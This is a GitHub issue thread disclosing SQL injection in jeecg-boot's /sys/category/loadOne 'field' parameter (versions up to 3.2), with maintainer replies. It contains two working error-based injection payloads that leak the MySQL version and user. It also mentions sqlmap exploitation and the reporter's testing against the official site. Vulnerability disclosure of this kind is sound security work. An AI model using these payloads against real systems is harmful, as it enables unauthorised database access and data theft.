-
Notifications
You must be signed in to change notification settings - Fork 15.5k
Description
版本号:
<=3.2
问题描述:
After tests found that the jeecg - boot/jeecg - boot/sys/category/loadOne interface field parameters have SQL injection.
SQL injection exists in an interface that queries the data of the classification dictionary. After using the https://github.com/jeecgboot/jeecg-boot project source code download the launcher, grab packets SQL injection can be performed after modified, and illustrates the use of the sqlmap SQL injection.
The data received by the interface is consistent with the data in the classification dictionary, but it is not the production interface of the classification dictionary. The following two figures:
截图&代码:
Payload (view MySQL version):/jeecg-boot/sys/category/loadOne?_t=1651480890&field=extractvalue(1,concat(char(126),(version()),md5(1678381038)))&val=f39a06bf9f390ba4a53d11bc4e0018d7
Payload (view the current user name and host name of MySQL):/jeecg-boot/sys/category/loadOne?_t=1651480890&field=extractvalue(1,concat(char(126),(user()),md5(1678381038)))&val=f39a06bf9f390ba4a53d11bc4e0018d7
Results injected using sqlmap:
友情提示(为了提高issue处理效率):
- 未按格式要求发帖,会被直接删掉;
- 请自己初判问题描述是否清楚,是否方便我们调查处理;
- 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能;
- 描述过于简单或模糊,导致无法处理的,会被直接删掉;
Activity
zhangdaiscott commentedon May 4, 2022
收录 ty
tygithub1 commentedon May 6, 2022
the menu "classified dictionary", there is no interface that you described to be called, if you want to test this interface
/sys/category/loadOne
,pls pass plain string instead of expressionGarck3h commentedon May 6, 2022
Oh, sorry. It may not be in the "classification dictionary" menu bar, but it does exist, it can query the "classification dictionary" data, by changing the value of the "field" attack, as shown in the normal request result:

Garck3h commentedon May 6, 2022
Hello, I have confirmed that the interface exists. When you perform the following steps, you will find the packet request. Common Cases --> Custom Components --> Tree Dictionary:


tygithub1 commentedon May 6, 2022
i got it , you can try like this:
Garck3h commentedon May 7, 2022
When I give it some malicious statements, I can query the version of the database, database name and other information, and even the whole database data down, so it is very dangerous.Here is a bit of offense to the official website, do the above verification.
zhangdaiscott commentedon May 7, 2022
已处理
chuxl2017 commentedon Jul 27, 2022
@zhangdaiscott 请问,对应的commit是哪个?